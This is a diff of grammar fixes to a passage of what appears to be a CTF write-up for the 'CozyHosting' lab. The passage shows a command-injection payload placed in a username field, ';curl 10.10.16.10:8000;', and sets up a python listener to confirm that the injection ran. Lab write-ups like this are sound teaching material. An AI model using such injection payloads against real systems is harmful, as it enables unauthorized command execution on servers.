Draterr/Draterr.github.io/_posts/2024-3-5-CozyHosting.markdown

 host=127.0.0.1&username=;curl 10.10.16.10:8000;
 ```

 When this request gets sent.
-We should expect the backend shell command will be transformed to
+We should expect the backend shell command to be transformed to

 ![Untitled](/assets/images/cozyhosting/13.png)

-Let’s send up a python http server on port 8000 to see if we sucessfully injected the curl command on the server.
+Let’s set up a python http server on port 8000 to see if we sucessfully injected the curl command on the server.

 ![Untitled](/assets/images/cozyhosting/14.png)